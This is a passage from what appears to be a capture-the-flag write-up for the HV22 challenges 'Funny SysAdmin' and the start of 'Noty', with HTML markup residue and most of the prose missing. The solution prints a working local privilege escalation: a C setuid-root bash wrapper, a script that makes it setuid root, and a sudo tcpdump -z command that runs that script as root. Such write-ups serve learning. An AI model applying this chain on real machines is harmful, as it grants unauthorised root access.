Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.12] Funny SysAdmin<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Goal<\/h2>\n\n\n\n
Resources<\/code> section to find out!<\/p>\n\n\n\nSolution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n#include <stdio.h>\nint main() {\n char *name[2];\n name[0] = \"bash\";\n name[1] = NULL;\n setuid(0); \/\/ sets the real user ID to 0 i.e. root\n execvp(\"\/bin\/bash\", name);\n}<\/pre>\n\n\n\n#!\/bin\/sh\n\/bin\/busybox chown root:root \/home\/santa\/bsh\n\/bin\/busybox chmod u+s \/home\/santa\/bsh<\/pre>\n\n\n\n
<\/a><\/figure>\n\n\n\nsudo tcpdump -ln -i eth0 -w a -W 1 -G 1 -z \/home\/santa\/bsh.sh -Z root<\/pre>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.13] Noty<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n